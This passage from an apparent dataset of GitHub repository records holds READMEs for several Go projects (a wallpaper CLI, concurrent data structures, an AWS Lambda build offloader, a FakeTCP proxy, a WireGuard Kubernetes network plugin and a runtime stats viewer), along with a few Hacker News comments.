\n\n\nA new era for Splash CLI is coming! After many weeks\nthinking how to upgrade the project codebase I decided to\ncompletely rewrite the CLI from the ground in Go.\n\nThe idea is to replicate the original functionality to keep\nthe new experience as close to the original as possible.\n\n### Why Go?\n- Distribution will not depend on NPM\n- No need to install any dependencies\n- Lighter bundle size\n- No need to use any build tools\n- Blazing fast (~2500%) (0.22s vs 5s)\n\n### Feature List\n- [x] Change wallpaper on your desktop\n- [x] Download photos\n- [x] Login to your account\n- [ ] Create new collections\n- [ ] Add photos to collections\n- [ ] Like photos\n- More to come\n\n### Build Locally\nTo build the project locally you can use the following command:\n\n```shell\n goreleaser --snapshot --rm-dist\n```\n\nBe sure to set up your environment before running the command.\nRequired environment variables are:\n - `UNSPLASH_CLIENT_ID`\n - `UNSPLASH_CLIENT_SECRET`\n\nYou can get credentials on the [Unsplash Developer Portal](https://unsplash.com/developers).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "puzpuzpuz/xsync", "link": "https://github.com/puzpuzpuz/xsync", "tags": [], "stars": 510, "description": "Concurrent data structures for Go", "lang": "Go", "repo_lang": "", "readme": "[![GoDoc reference](https://img.shields.io/badge/godoc-reference-blue.svg)](https://pkg.go.dev/github.com/puzpuzpuz/xsync/v2)\n[![GoReport](https://goreportcard.com/badge/github.com/puzpuzpuz/xsync/v2)](https://goreportcard.com/report/github.com/puzpuzpuz/xsync/v2)\n[![codecov](https://codecov.io/gh/puzpuzpuz/xsync/branch/main/graph/badge.svg)](https://codecov.io/gh/puzpuzpuz/xsync)\n\n# xsync\n\nConcurrent data structures for Go. Aims to provide more scalable alternatives for some of the data structures from the standard `sync` package, but not only.\n\n### Benchmarks\n\nBenchmark results may be found [here](BENCHMARKS.md).\n\n## Counter\n\nA `Counter` is a striped `int64` counter inspired by the `j.u.c.a.LongAdder` class from Java standard library.\n\n```go\nc := xsync.NewCounter()\n// increment and decrement the counter\nc.Inc()\nc.Dec()\n// read the current value \nv := c.Value()\n```\n\nWorks better in comparison with a single atomically updated `int64` counter in high contention scenarios.\n\n## Map\n\nA `Map` is like a concurrent hash table based map. It follows the interface of `sync.Map` with a number of valuable extensions like `Compute` or `Size`.\n\n```go\nm := xsync.NewMap()\nm.Store(\"foo\", \"bar\")\nv, ok := m.Load(\"foo\")\ns := m.Size()\n```\n\n`Map` uses a modified version of Cache-Line Hash Table (CLHT) data structure: https://github.com/LPD-EPFL/CLHT\n\nCLHT is built around idea to organize the hash table in cache-line-sized buckets, so that on all modern CPUs update operations complete with minimal cache-line transfer. Also, `Get` operations are obstruction-free and involve no writes to shared memory, hence no mutexes or any other sort of locks. Due to this design, in all considered scenarios `Map` outperforms `sync.Map`.\n\nOne important difference with `sync.Map` is that only string keys are supported. That's because Golang standard library does not expose the built-in hash functions for `interface{}` values.\n\n`MapOf[K, V]` is an implementation with parametrized value type. It is available for Go 1.18 or later. 
While it's still a CLHT-inspired hash map, `MapOf`'s design is quite different from `Map`. As a result, less GC pressure and less atomic operations on reads.\n\n```go\nm := xsync.NewMapOf[string]()\nm.Store(\"foo\", \"bar\")\nv, ok := m.Load(\"foo\")\n```\n\nOne important difference with `Map` is that `MapOf` supports arbitrary `comparable` key types:\n\n```go\ntype Point struct {\n\tx int32\n\ty int32\n}\nm := NewTypedMapOf[Point, int](func(seed maphash.Seed, p Point) uint64 {\n\t// provide a hash function when creating the MapOf;\n\t// we recommend using the hash/maphash package for the function\n\tvar h maphash.Hash\n\th.SetSeed(seed)\n\tbinary.Write(&h, binary.LittleEndian, p.x)\n\thash := h.Sum64()\n\th.Reset()\n\tbinary.Write(&h, binary.LittleEndian, p.y)\n\treturn 31*hash + h.Sum64()\n})\nm.Store(Point{42, 42}, 42)\nv, ok := m.Load(point{42, 42})\n```\n\n## MPMCQueue\n\nA `MPMCQeueue` is a bounded multi-producer multi-consumer concurrent queue.\n\n```go\nq := xsync.NewMPMCQueue(1024)\n// producer inserts an item into the queue\nq.Enqueue(\"foo\")\n// optimistic insertion attempt; doesn't block\ninserted := q.TryEnqueue(\"bar\")\n// consumer obtains an item from the queue\nitem := q.Dequeue()\n// optimistic obtain attempt; doesn't block\nitem, ok := q.TryDequeue()\n```\n\nBased on the algorithm from the [MPMCQueue](https://github.com/rigtorp/MPMCQueue) C++ library which in its turn references D.Vyukov's [MPMC queue](https://www.1024cores.net/home/lock-free-algorithms/queues/bounded-mpmc-queue). According to the following [classification](https://www.1024cores.net/home/lock-free-algorithms/queues), the queue is array-based, fails on overflow, provides causal FIFO, has blocking producers and consumers.\n\nThe idea of the algorithm is to allow parallelism for concurrent producers and consumers by introducing the notion of tickets, i.e. values of two counters, one per producers/consumers. An atomic increment of one of those counters is the only noticeable contention point in queue operations. The rest of the operation avoids contention on writes thanks to the turn-based read/write access for each of the queue items.\n\nIn essence, `MPMCQueue` is a specialized queue for scenarios where there are multiple concurrent producers and consumers of a single queue running on a large multicore machine.\n\nTo get the optimal performance, you may want to set the queue size to be large enough, say, an order of magnitude greater than the number of producers/consumers, to allow producers and consumers to progress with their queue operations in parallel most of the time.\n\n## RBMutex\n\nA `RBMutex` is a reader biased reader/writer mutual exclusion lock. The lock can be held by an many readers or a single writer.\n\n```go\nmu := xsync.NewRBMutex()\n// reader lock calls return a token\nt := mu.RLock()\n// the token must be later used to unlock the mutex\nmu.RUnlock(t)\n// writer locks are the same as in sync.RWMutex\nmu.Lock()\nmu.Unlock()\n```\n\n`RBMutex` is based on a modified version of BRAVO (Biased Locking for Reader-Writer Locks) algorithm: https://arxiv.org/pdf/1810.01553.pdf\n\nThe idea of the algorithm is to build on top of an existing reader-writer mutex and introduce a fast path for readers. On the fast path, reader lock attempts are sharded over an internal array based on the reader identity (a token in case of Golang). 
This means that readers do not contend over a single atomic counter like it's done in, say, `sync.RWMutex` allowing for better scalability in terms of cores.\n\nHence, by the design `RBMutex` is a specialized mutex for scenarios, such as caches, where the vast majority of locks are acquired by readers and write lock acquire attempts are infrequent. In such scenarios, `RBMutex` should perform better than the `sync.RWMutex` on large multicore machines.\n\n`RBMutex` extends `sync.RWMutex` internally and uses it as the \"reader bias disabled\" fallback, so the same semantics apply. The only noticeable difference is in the reader tokens returned from the `RLock`/`RUnlock` methods.\n\n## License\n\nLicensed under MIT.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "nelhage/llama", "link": "https://github.com/nelhage/llama", "tags": [], "stars": 510, "description": null, "lang": "Go", "repo_lang": "", "readme": "# llama -- A CLI for outsourcing computation to AWS Lambda\n\nLlama is a tool for running UNIX commands inside of AWS Lambda. Its\ngoal is to make it easy to outsource compute-heavy tasks to Lambda,\nwith its enormous available parallelism, from your shell.\n\nMost notably, llama includes `llamacc`, a drop-in replacement for\n`gcc` or `clang` which executes the compilation in the cloud, allowing\nfor considerable speedups building large C or C++ software projects.\n\nLambda offers nearly-arbitrary parallelism and burst capacity for\ncompute, making it, in principle, well-suited as a backend for\ninteractive tasks that briefly require large amounts of compute. This\nidea has been explored in the [ExCamera][excamera] and [gg][gg]\npapers, but is not widely accessible at present.\n\n[excamera]: https://www.usenix.org/conference/nsdi17/technical-sessions/presentation/fouladi\n\n## Performance numbers\n\nHere are a few performance results from my testing demonstrating the\ncurrent speedups achievable from `llamacc`:\n\n|project|hardware|local build|local time|llamacc build|llamacc time|Approx llamacc cost|\n|-------|--------|-----------|----------|-------------|------------|-------------------|\n|Linux v5.10 defconfig|Desktop (24-thread Ryzen 9 3900)|`make -j30`|1:06|`make -j100`|0:42|$0.15|\n|Linux v5.10 defconfig|Simulated laptop (limited to 4 threads)|`make -j8`|4:56|`make -j100`|1:26|$0.15|\n|clang+LLVM, -O0|Desktop (24-thread Ryzen 9 3900)|`ninja -j30`|5:33|`ninja -j400`|1:24|$0.49|\n\nAs you can see, Llama is capable of speedups for large builds even on\nmy large, powerful desktop system, and the advantage is more\npronounced on smaller workstations.\n\n# Getting started\n\n## Dependencies\n\n- A Linux x86_64 machine. Llama only supports that platform for\n now. Cross-compilation should in theory be possible but is not\n implemented.\n- The [Go compiler](https://golang.org/dl/). Llama is tested on v1.16\n but older versions may work.\n- An [AWS account](https://aws.amazon.com/)\n\n### Install llama\n\nYou'll need to install Llama from source. You can run\n\n```\ngo install github.com/nelhage/llama/cmd/...@latest\n```\n\nor clone this repository and run\n```\ngo install ./...\n```\n\nIf you want to build C++, you'll want to symlink `llamac++` to point\nat `llamacc`:\n\n```\nln -nsf llamacc \"$(dirname $(which llamacc))/llamac++\"\n```\n\n### Set up your AWS credentials\n\nLlama needs access to your AWS credentials. 
You can provide them in\nthe environment via `AWS_ACCESS_KEY_ID`/`AWS_SECRET_ACCESS_KEY`, but\nthe recommended approach is to use [`~/.aws/credentials`][aws-creds],\nas used by. Llama will read keys out of either.\n\n[aws-creds]: https://docs.aws.amazon.com/cli/latest/userguide/cli-configure-files.html\n\nThe account whose credentials you use must have sufficient permissions. The\nfollowing should suffice:\n\n* AmazonEC2ContainerRegistryFullAccess\n* AmazonS3FullAccess\n* AWSCloudFormationFullAccess\n* AWSLambdaFullAccess\n* IAMFullAccess\n\n### Configure llama's AWS resources\n\nLlama includes a [CloudFormation][cf] template and a command which\nuses it to bootstrap all required resources. You can [read the\ntemplate][template] to see what it's going to do.\n\n[cf]: https://aws.amazon.com/cloudformation/\n[template]: https://github.com/nelhage/llama/blob/master/cmd/llama/internal/bootstrap/template.json\n\nOnce your AWS credentials are ready, run\n\n```\n$ llama bootstrap\n```\n\nto create\nthe required AWS resources. By default, it will prompt you for an AWS\nregion to use; you can avoid the prompt using (e.g.) `llama -region\nus-west-2 bootstrap`.\n\nIf you get an error like\n```\nCreating cloudformation stack...\nStack created. Polling until completion...\nStack is in rollback: ROLLBACK_IN_PROGRESS. Something went wrong.\nStack status reason: The following resource(s) failed to create: [Repository, Bucket]. Rollback requested by user.\n```\n\nthen you can go to the AWS web console, and find the relevant CloudFormation\nstack. The event log should have more useful errors explaining what went\nwrong. You will then need to delete the stack before retrying the bootstrap.\n\n### Set up a GCC image\n\nYou'll need to build a container with an appropriate version of GCC for `llamacc` to use.\n\nIf you are running Debian or Ubuntu, you can use\n`scripts/build-gcc-image` to automatically build a Debian image and\nLambda function matching your local system:\n\n```console\n$ scripts/build-gcc-image\n```\n\nIf you want more control or are running another distribution, you can\nlook at `images/gcc-focal` for an example Dockerfile to build a\ncompiler package. You can build that or a similar image into a Lambda\nfunction using `llama update-function` like so:\n\n``` console\n$ llama update-function --create --build=images/gcc-focal gcc\n```\n\n## Using `llamacc`\n\nTo use `llamacc`, run a build using `make` or a similar build system\nwith a much higher `-j` concurrency than you normally would -- try\n5-10x the number of local cores,, and using `llamacc` or `llamac++` as\nyour compiler. For example, you might invoke\n\n``` console\n$ make -j100 CC=llamacc CXX=llamac++\n```\n\n## llamacc configuration\n\n`llamacc` takes a number of configuration options from the\nenvironment, so that they're easy to pass through your build\nsystem. The currently supported options include.\n\n|Variable|Meaning|\n|--------|-------|\n|`LLAMACC_VERBOSE`| Print commands executed by llamacc|\n|`LLAMACC_LOCAL` | Run the compilation locally. Useful for e.g. `CC=llamacc ./configure` |\n|`LLAMACC_REMOTE_ASSEMBLE`| Assemble `.S` or `.s` files remotely, as well as C/C++. 
|\n|`LLAMACC_FUNCTION`| Override the name of the lambda function for the compiler|\n|`LLAMACC_LOCAL_CC`| Specifies the C compiler to delegate to locally, instead of using 'cc' |\n|`LLAMACC_LOCAL_CXX`| Specifies the C++ compiler to delegate to locally, instead of using 'c++' |\n|`LLAMACC_LOCAL_PREPROCESS`| Run the preprocessor locally and send preprocessed source text to the cloud, instead of individual headers. Uses less total compute but much more bandwidth; this can easily saturate your uplink on large builds. |\n|`LLAMACC_FULL_PREPROCESS`| Run the full preprocessor locally, not just `#include` processing. Disables use of GCC-specific `-fdirectives-only`|\n|`LLAMACC_BUILD_ID`| Assigns an ID to the build. Used for Llama's internal tracing support. |\n|`LLAMACC_FILTER_WARNINGS`| Filters the given comma-separated list of warnings out of all the compilations, e.g. `LLAMACC_FILTER_WARNINGS=missing-include-dirs,packed-not-aligned`. |\n\nIt is strongly recommended that you use absolute paths if you set\n`LLAMACC_LOCAL_CC` and `LLAMACC_LOCAL_CXX`. Not all build systems will\npreserve `$PATH` all the way down to `llamacc`, so if you don't use\nabsolute paths, you can get build failures that are difficult to diagnose.\n\n# Other features\n\n## `llama invoke`\n\nYou can use `llama invoke` to execute individual commands inside of\nLambda. The syntax is `llama invoke \nargs...`. `` must be the name of a Lambda function using the\nLlama runtime. So, for instance, we can inspect the OS running inside\nour Lambda image:\n\n``` console\n$ llama invoke gcc uname -a\nLinux 169.254.248.253 4.14.225-175.364.amzn2.x86_64 #1 SMP Mon Mar 22 22:06:01 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux\n```\n\nIf your function consumes files as input or output, you can use the\n`-f` and `-o` options to specify that files should be passed between\nthe local and remote nodes. For instance:\n\n``` console\n$ llama invoke -f README.md:INPUT -o OUTPUT gcc sh -c 'sha256sum INPUT > OUTPUT'; cat OUTPUT\n16c399c108bb783fc5c4529df4fecd0decb81bc0707096ebd981ab2b669fae20 INPUT\n```\n\nNote the use of `LOCAL:REMOTE` syntax to optionally specify different\npaths between the local and remote ends.\n\n## `llama xargs`\n\n`llama xargs` provides an xargs-like interface for running commands in\nparallel in Lambda. Here's an example:\n\nThe [`optipng`](http://optipng.sourceforge.net/) command compresses\nPNG files and otherwise optimizes them to be as small as possible,\ntypically used in order to save bandwidth and speed load times on\nimage assets. `optipng` is somewhat computationally expensive and\ncompressing a large number of PNG files can be a slow operation. With\n`llama`, we can optimize a large of images by outsourcing the\ncomputation to lambda.\n\nI prepared a directory full of 151 PNG images of the original Pok\u00e9mon,\nand benchmarked how long it took to optimize them using 8 concurrent\nprocesses on my desktop:\n\n\n```console\n$ time ls -1 *.png | parallel -j 8 optipng {} -out optimized/{/}\n[...]\nreal 0m45.090s\nuser 5m33.745s\nsys 0m0.924s\n```\n\nOnce we've prepared and `optipng` lambda function (we'll talk about\nsetup in a later section), we can use `llama` to run the same\ncomputation in AWS Lambda:\n\n```console\n$ time ls -1 *.png | llama xargs -logs -j 151 optipng optipng '{{.I .Line}}' -out '{{.O (printf \"optimized/%s\" .Line)}}'\nreal 0m16.024s\nuser 0m2.013s\nsys 0m0.569s\n```\n\nWe use `llama xargs`, which works a bit like `xargs(1)`, but runs each\ninput line as a separate command in Lambda. 
It also uses the Go\ntemplate language to provide flexibility in substitutions, and offers\nthe special `.Input` and `.Output` methods (`.I` and `.O` for short)\nto mark files to be passed back and forth between the local\nenvironment and Lambda.\n\nLambda's CPUs are slower than my desktop and the network operations\nhave overhead, and so we don't see anywhere near a full `151/8`\nspeedup. However, the additional parallelism still nets us a 3x\nimprovement in real-time latency. Note also the vastly decreased\n`user` time, demonstrating that the CPU-intensive work has been\noffloaded, freeing up local compute resources for interactive\napplications or other use cases.\n\nThis operation consumed about 700 CPU-seconds in Lambda. I configured\n`optipng` to have 1792MB of memory, which is the point at which lambda\nallocates a full vCPU to the process. That comes out to about 1254400\nMB-seconds of usage, or about $0.017 assuming I'm already out of the\nLambda free tier.\n\n## Managing Llama functions\n\nThe llama runtime is designed to make it easy to bridge arbitrary\nimages into Lambda. You can look at `images/optipng/Dockerfile` in\nthis repository for a well-commented example explaining how you can\nwrap an arbitrary image inside of Lambda for use by Llama.\n\nOnce you have a Dockerfile or a Docker image, you can use `llama\nupdate-function` to upload it to ECR and manage the associated Lambda\nfunction. For instance, we could build optipng for the above example\nlike so:\n\n```console\n$ llama update-function --create --build=images/optipng optipng\n```\n\nWhen specifying the memory size for your functions, note that [Lambda\nassigns CPU resources to functions based on their memory\nallocation](https://docs.aws.amazon.com/lambda/latest/dg/configuration-memory.html). At\n1,769 MB, your function will have the equivalent of one full core.\n\n# Other notes\n\n## Inspiration\n\nLlama is in large part inspired by [`gg`][gg], a tool for outsourcing\nbuilds to Lambda. Llama is a much simpler tool but shares some of the\nsame ideas and is inspired by a very similar vision of using Lambda as\nhigh-concurrency burst computation for interactive uses.\n\n[gg]: https://github.com/StanfordSNR/gg\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "zhxie/ikago", "link": "https://github.com/zhxie/ikago", "tags": [], "stars": 510, "description": "IkaGo is a proxy which helps bypassing UDP blocking, UDP QoS and NAT firewall written in Go.", "lang": "Go", "repo_lang": "", "readme": "# IkaGo\n\n**IkaGo** is a proxy which helps bypassing UDP blocking, UDP QoS and NAT firewall written in Go.\n\n*IkaGo is designed to accelerate games in game consoles.*\n\n*If you have a SOCKS5 proxy, use [pcap2socks](https://github.com/zhxie/pcap2socks) for better performance.*\n\n

\n \"an\n

\n

\n Pass the firewall like a squid : )\n

\n\n## Features\n\n

\n \"diagram\"\n

\n\n- **FakeTCP**: All TCP, UDP and ICMPv4 packets will be sent with a TCP header to bypass UDP blocking and UDP QoS. Inspired by [Udp2raw-tunnel](https://github.com/wangyu-/udp2raw-tunnel). The handshaking of TCP is also simulated.\n- **Proxy ARP**: Reply ARP request as it owns the specified address which is not on the network.\n- **Multiplexing and Multiple**: One client can handle multiple connections from different devices. And one server can serve multiple clients.\n- **Cross Platform**: Works well with Windows, macOS, Linux and others in theory.\n- **Monitor**: Observe traffic on [IkaGo-web](https://zhxie.github.io/ikago-web)\n- **Full Cone NAT**\n- **Encryption**\n- **KCP Support**\n\n## Dependencies\n\n1. [Npcap](http://www.npcap.org/) or WinPcap in Windows, libpcap in macOS, Linux and others.\n\n2. (Optional, recommended) pf in macOS, iptables and ethtool in Linux for automatic firewall rule addition.\n\n## Usage\n\n```\n# Client\ngo run ./cmd/ikago-client -r [sources] -s [ip:port]\n\n# Server\ngo run ./cmd/ikago-server -p [port]\n```\n\nExamples of configuration file are [here](/configs).\n\n### Common options\n\n`-list-devices`: (Optional, exclusive) List all valid devices in current computer.\n\n`-c path`: (Optional, exclusive) Configuration file. Examples of configuration file are [here](/configs). If IkaGo does not receive any arguments except `-v`, it will automatically read the configuration file `config.json` in the working directory if it exists.\n\n`-listen-devices devices`: (Optional) Devices for listening, use comma to separate multiple devices. If this value is not set, all valid devices excluding loopback devices will be used. For example, `-listen-devices eth0,wifi0,lo`.\n\n`-upstream-device device`: (Optional) Device for routing upstream to. If this value is not set, the first valid device with the same domain of gateway will be used.\n\n`-gateway address`: (Optional) Gateway address. If this value is not set, the first gateway address in the routing table will be used.\n\n`-mode mode`: (Optional) Mode, can be `faketcp`, `tcp`. Default as `tcp`. This option needs to be set consistently between the client and the server. You may have to configure your firewall by using `-rule` or follow the [troubleshoot](https://github.com/zhxie/ikago#troubleshoot) below in some modes.\n\n`-method method`: (Optional) Method of encryption, can be `plain`, `aes-128-gcm`, `aes-192-gcm`, `aes-256-gcm`, `chacha20-poly1305` or `xchacha20-poly1305`. Default as `plain`. This option needs to be set consistently between the client and the server. For more about encryption, please refer to the [development documentation](/dev.md).\n\n`-password password`: (Optional) Password of encryption, must be set only when method is not `plain`. This option needs to be set consistently between the client and the server.\n\n`-rule`: (Optional, recommended) Add firewall rule. In some OS, firewall rules need to be added to ensure the operation of IkaGo. Rules are described in [troubleshoot](https://github.com/zhxie/ikago#troubleshoot) below.\n\n`-monitor port`: (Optional) Port for monitoring. If this value is set, IkaGo will host HTTP server on `localhost:port` and print JSON statistics on it. You can observe observe traffic on [IkaGo-web](http://ikago.ikas.ink).\n\n`-v`: (Optional) Print verbose messages. Either `-v` or `verbose` in configuration file is set `true`, IkaGo will print verbose messages.\n\n`-log path`: (Optional) Log.\n\n#### FakeTCP options\n\n`-mtu size`: (Optional) MTU. 
MTU is set in traffic between the client and the server.\n\n`-kcp`: (Optional) Enable KCP. This option needs to be set consistently between the client and the server.\n\n`-kcp-mtu size`, `-kcp-sndwnd size`, `-kcp-rcvwnd size`, `-kcp-datashard size`, `-kcp-parityshard size`, `-kcp-acknodelay`: (Optional) KCP tuning options. These options need to be set consistently between the client and the server. Please refer to the [kcp-go](https://godoc.org/github.com/xtaci/kcp-go).\n\n`-kcp-nodelay`, `-kcp-interval size`, `kcp-resend size`, `kcp-nc size`: (Optional) KCP tuning options. These options need to be set consistently between the client and the server. Please refer to the [kcp](https://github.com/skywind3000/kcp/blob/master/README.en.md#protocol-configuration).\n\n### Client options\n\n`-publish addresses`: (Optional, recommended) ARP publishing address. If this value is set, IkaGo will reply ARP request as it owns the specified address which is not on the network, also called proxy ARP.\n\n`-fragment size`: (Optional) Fragmentation size for listening. If this value is set, packets sending from the client to sources will be fragmented by the given size.\n\n`-p port`: (Optional) Port for routing upstream. If this value is not set or set as `0`, a random port from 49152 to 65535 will be used.\n\n`-r addresses`: Sources, use comma to separate multiple addresses. Packets with the same source's address will be proxied.\n\n`-s address`: Server.\n\n### Server options\n\n`-fragment size`: (Optional) Fragmentation size for routing upstream. If this value is set, packets sending from the server to destinations will be fragmented by the given size.\n\n`-p port`: Port for listening.\n\n## Troubleshoot\n\n1. Because IkaGo use pcap to handle packets, it will not notify the OS if IkaGo is listening to any ports, all the connections are built manually. Some OS may operate with the packet in advance, while they have no information of the packet in there TCP stacks, and respond with a RST packet or even drop the packet. **You may configure iptables in Linux, pf in macOS and FreeBSD**, or Windows Firewall in Windows (You may not need to) with the following rules to solve the problem. **If you are using mode `tcp`, you may not need to configure the firewall, but you still have to disable IP forward.**\n ```\n // Linux\n // IkaGo-server\n sysctl -w net.ipv4.ip_forward=0\n iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP\n // IkaGo-client with proxy ARP and FakeTCP\n sysctl -w net.ipv4.ip_forward=0\n iptables -A OUTPUT -s server_ip/32 -p tcp --dport server_port -j DROP\n\n // macOS, FreeBSD\n // IkaGo-client with proxy ARP and FakeTCP\n sysctl -w net.inet.ip.forwarding=0\n echo \"block drop proto tcp from any to server_ip port server_port\" >> ./pf.conf\n pfctl -f ./pf.conf\n pfctl -e\n\n // Windows (You may not need to)\n // IkaGo-client with proxy ARP\n netsh advfirewall firewall add rule name=IkaGo-client protocol=TCP dir=in remoteip=server_ip/32 remoteport=server_port action=block\n netsh advfirewall firewall add rule name=IkaGo-client protocol=TCP dir=out remoteip=server_ip/32 remoteport=server_port action=block\n ```\n\n2. IkaGo prepend packets with TCP header, so an extra IPv4 and TCP header will be added to the packet. As a consequence, an extra 40 Bytes will be added to the total packet size. For encryption, extra bytes according to the method, up to 40 Bytes, and for KCP support, another 32 Bytes. 
IkaGo will fragment packets which are oversize, but excessive use in the packet header will cause a significant decrease in performance.\n\n3. IkaGo requires root permission in some OS by default. But you can run IkaGo with non-root running this command\n ```\n // Linux\n setcap cap_net_raw+ep path_to_ikago\n ```\n before opening IkaGo. If you run IkaGo with non-root, `-rule` will not work, please add firewall rules described in [troubleshoot](https://github.com/zhxie/ikago#troubleshoot) manually.\n\n4. IkaGo acts as a router and handles segments and fragments. Generic receive offload (GRO) enabled by default in some OS may increase network performance, but affect the normal operation of IkaGo because it breaks the end-to-end principle. You can disable GRO manually.\n ```\n // Linux\n sudo ethtool --offload network_interface_like_eth0 gro off\n ```\n\n## Limitations\n\n1. IPv6 is not supported because the dependency package [gopacket](https://github.com/google/gopacket) does not fully implement the serialization of the IPv6 extension header.\n\n## Known Issues\n\n1. When using mode TCP, sticky packets problems may occur in TCP connections. If encryption is enabled at the same time, IkaGo may not be able to destick these packets.\n\n2. Applications like VMWare Workstation on Windows may implement their own IP forwarding and forward packets that should be handled by IkaGo, resulting in abnormal operations in IkaGo.\n\n## Todo\n\n- [ ] Change sending packets to destinations procedures in IkaGo-server from pcap to standard connection\n- [ ] Build own application layer protocol to realize functions like delay detection\n- [ ] Discover the way handling packets concurrently to optimize performance\n\n## License\n\nIkaGo is licensed under [the MIT License](/LICENSE).\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "gravitational/wormhole", "link": "https://github.com/gravitational/wormhole", "tags": [], "stars": 510, "description": "Wireguard based overlay network CNI plugin for kubernetes", "lang": "Go", "repo_lang": "", "readme": "# Support Notice\n\n**The Wormhole project is no longer under active development.** \nThe project's development has been limited to maintenance and support for our\ncommercial customers until maintenance agreements expire.\n\nPlease see our blog post for more information:\nhttps://goteleport.com/blog/gravitational-is-teleport/\n\n# Gravitational Wormhole\nWormhole is a simple [CNI plugin](https://github.com/containernetworking/cni) designed to create an encrypted overlay network for [kubernetes](https://kubernetes.io) clusters.\n\n[WireGuard](https://www.wireguard.com) is a fascinating Fast, Modern, Secure VPN tunnel, that has been gaining significant praise from security experts, and is currently proposed for inclusion within the linux kernel.\n\nWormhole uses WireGuard to create a simple and secure high performance encrypted overlay network for kubernetes clusters, that is easy to manage and troubleshoot.\n\nWormhole does not implement network policy, instead we recommend to use [calico](https://github.com/projectcalico/calico) or [kube-router](https://github.com/cloudnativelabs/kube-router) as network policy controllers.\n\n## Notice\n\n\n\n## Getting Started\n\n### System Requirements\n1. [WireGuard](https://www.wireguard.com/install/) is installed on each node in you're cluster.\n2. 
A Kubernetes cluster with IPAM enabled (--pod-network-cidr= when using kubeadm based install)\n\n### Install (Kubeadm Cluster)\n```console\nkubectl apply -f https://raw.githubusercontent.com/gravitational/wormhole/master/docs/kube-wormhole.yaml\n```\n\nNote: The kubeadm cluster must be initialized with (--pod-network-cidr / --service-cidr) to enable IPAM\n\n### Install (Generic)\n```console\nkubectl apply -f https://raw.githubusercontent.com/gravitational/wormhole/master/docs/generic-wormhole.yaml\n```\n\nNote: Replace the --overlay-cidr flag in the daemonset with the overlay-cidr that matches you're network\nNote: Kubernetes IPAM must be enabled (--cluster-cidr / --allocate-node-cidrs on kube-controller-manager)\n\n## Troubleshooting\nSee [troubleshooting.md](docs/troubleshooting.md)\n\n## Build and Publish to a docker registry\n\n```\nWORM_REGISTRY_IMAGE=\"quay.io/gravitational/wormhole\" go run mage.go build:publish\n```\n\n## Test\n\n```\ngo run mage.go test:all\n```\n\n\n## More Information\n- [Wormhole RFC](docs/rfcs/0001-spec.md)\n\n## Contributing\nThe best way to contribute is to create issues or pull requests right here on Github. You can also reach the Gravitational team through their [website](https://gravitational.com)\n\n## Resources\n|Project Links| Description\n|---|----\n| [Blog](http://blog.gravitational.com) | Our blog, where we publish gravitational news |\n| [Security and Release Updates](https://community.gravitational.com/c/wormhole-news) | Subscribe to our discourse for security and news updates |\n| [Community Forum](https://community.gravitational.com/c/wormhole) | Gravitational Community Forum|\n\n## Who Built Wormhole?\nWormhole was created by [Gravitational Inc.](https://gravitational.com) We have built wormhole by leveraging our experience automating and supporting hundreds of kubernetes clusters with [Gravity](https://gravitational.com/gravity/), our Kubernetes distribution optimized for deploying and remotely controlling complex applications into multiple environments at the same time:\n\n- Multiple cloud regions\n- Colocation\n- Private enterprise clouds located behind firewalls\n", "readme_type": "markdown", "hn_comments": "Just afraid that time will come, when searching for black hole, neutrinos, gravity will primarily yield these kinds of topics. Not actual ones.Doesn't Istio provide inter-pod encryption, or am I totally off the reservation here?We were recently discussing creating something like for this, the current set of CNI options is wide but shallow. As mentioned in the article CNI is something you want to be as simple as possible, we\u2019ve had trouble with weave and all it\u2019s complexity. 
Flannel plus encryption is perfect!Big warning to readers:If Gravitational asks you to complete an 'engineering challenge' they are using you for free labour.See: https://news.ycombinator.com/item?id=19784787I thought I understood this, and that it replaced (and no doubt did a better job of) what I'd already done - WG to get nodes on the same network, CNI on top.But requirement 2 confused me:\n> A Kubernetes cluster with IPAM enabled (--pod-network-cidr= when using kubeadm based install)So, do node machines need to already be on the same network or not?> If you\u2019re running Kubernetes in a network you don\u2019t fully trust or need to encrypt all pod network traffic between hosts for legacy applications or compliance reasons, Wormhole might be for youIs there a good analysis somewhere about how typical kubernetes setups trust the network and what badness an advesary could do with kubernetes network access? How sound is this default deployment setup from security POV?For example I think DNS is used internally for service discovery, and incoming TLS is often terminated and proxied onwards as HTTP - those could be both MITMed, right?Very cool to see WireGuard being used in a mesh implementation. This reminds me of Weave[0] which has worked well for me. I'll definitely be experimenting with Wormhole.[0] https://www.weave.works/oss/net/Author here. Feel free to reach out if you have questions or thoughts about the project.Should've named it Wrmhole so it's appropriately 21st century. Dropping vowels is all the rage.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "go-echarts/statsview", "link": "https://github.com/go-echarts/statsview", "tags": [], "stars": 510, "description": "\ud83d\ude80 A real-time Golang runtime stats visualization profiler", "lang": "Go", "repo_lang": "", "readme": "# \ud83d\ude80 Statsview\n\nStatsview is a real-time Golang runtime stats visualization profiler. It is built top on another open-source project, [go-echarts](https://github.com/go-echarts/go-echarts), which helps statsview to show its graphs on the browser.\n\n\n \"Contributions\n\n\n \"Go\n\n\n \"MIT\n\n\n \"GoDoc\"\n \n\n## \ud83d\udd30 Installation\n\n```shell\n$ go get -u github.com/go-echarts/statsview/...\n```\n\n## \ud83d\udcdd Usage\n\nStatsview is quite simple to use and all static assets have been packaged into the project which makes it possible to run offline. It's worth pointing out that statsview has integrated the standard `net/http/pprof` hence statsview will be the only profiler you need.\n\n```golang\npackage main\n\nimport (\n \"time\"\n\n \"github.com/go-echarts/statsview\"\n)\n\nfunc main() {\n\tmgr := statsview.New()\n\n\t// Start() runs a HTTP server at `localhost:18066` by default.\n\tgo mgr.Start()\n\n\t// Stop() will shutdown the http server gracefully\n\t// mgr.Stop()\n\n\t// busy working....\n\ttime.Sleep(time.Minute)\n}\n\n// Visit your browser at http://localhost:18066/debug/statsview\n// Or debug as always via http://localhost:18066/debug/pprof, http://localhost:18066/debug/pprof/heap, ...\n```\n\n## \u2699\ufe0f 